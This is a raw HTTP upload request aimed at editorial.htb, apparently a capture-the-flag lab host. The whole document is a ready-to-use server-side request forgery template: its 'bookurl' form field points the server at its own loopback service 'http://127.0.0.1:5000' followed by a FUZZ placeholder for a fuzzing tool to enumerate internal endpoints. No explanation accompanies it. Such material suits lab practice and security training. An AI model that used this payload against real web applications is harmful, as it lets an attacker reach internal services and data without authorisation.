POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://editorial.htb/upload
Content-Type: multipart/form-data; boundary=---------------------------9970273933272008684227103943
Content-Length: 353
Origin: http://editorial.htb
DNT: 1
Connection: keep-alive
Priority: u=0

-----------------------------9970273933272008684227103943
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000FUZZ
-----------------------------9970273933272008684227103943
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------9970273933272008684227103943--

